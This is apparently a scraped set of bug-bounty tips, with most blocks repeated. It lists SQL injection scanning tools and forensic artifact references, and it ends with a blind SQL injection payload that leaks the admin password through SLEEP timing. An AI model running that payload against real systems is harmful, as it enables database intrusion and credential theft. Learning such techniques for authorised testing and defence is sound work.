#SQLi
SQLiScanner
https://github.com/0xbug/SQLiScanner
Fox-scan
https://github.com/fengxuangit/Fox-scan
Atlas
https://github.com/m4ll0k/Atlas
Sqli-hunter
https://github.com/zt2/sqli-hunter
AutoSQLi
https://github.com/sheldoncoupeheure/AutoSQLi
Sqlmap4burp++
https://github.com/c0ny1/sqlmap4burp-plus-plus
Sqlmap tamper api
https://github.com/KINGSABRI/sqlmap-tamper-api
#bugbounty.#bugbountytips
SQLiScanner
https://github.com/0xbug/SQLiScanner
Fox-scan
https://github.com/fengxuangit/Fox-scan
Atlas
https://github.com/m4ll0k/Atlas
Sqli-hunter
https://github.com/zt2/sqli-hunter
AutoSQLi
https://github.com/sheldoncoupeheure/AutoSQLi
Sqlmap4burp++
https://github.com/c0ny1/sqlmap4burp-plus-plus
Sqlmap tamper api
https://github.com/KINGSABRI/sqlmap-tamper-api
#bugbounty.#bugbountytips
GitHub
GitHub - 0xbug/SQLiScanner: Automatic SQL injection with Charles and sqlmap api
Automatic SQL injection with Charles and sqlmap api - 0xbug/SQLiScanner
Here's some Forensics Resources.
Windows Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/windows.yaml
2. https://sans.org/security-resources/posters/windows-forensic-analysis/170/download
3. https://digital-forensics.sans.org/media/SANS_Poster_2018_Hunt_Evil_FINAL.pdf
Linux Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/linux.yaml
MacOS X Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/macos.yaml
Windows Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/windows.yaml
2. https://sans.org/security-resources/posters/windows-forensic-analysis/170/download
3. https://digital-forensics.sans.org/media/SANS_Poster_2018_Hunt_Evil_FINAL.pdf
Linux Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/linux.yaml
MacOS X Forensic Artifacts:
1. https://raw.githubusercontent.com/ForensicArtifacts/artifacts/master/data/macos.yaml
Exfiltrate data from a blind SQL Injection in SELECT clause.
SELECT SLEEP(ASCII(SUBSTRING((SELECT password FROM users WHERE name = 'admin'),1,1)/2));
Converts output of SUBSTRING query to ASCII code, divides it by two, then sleeps for that long (see response time for char code)
SELECT SLEEP(ASCII(SUBSTRING((SELECT password FROM users WHERE name = 'admin'),1,1)/2));
Converts output of SUBSTRING query to ASCII code, divides it by two, then sleeps for that long (see response time for char code)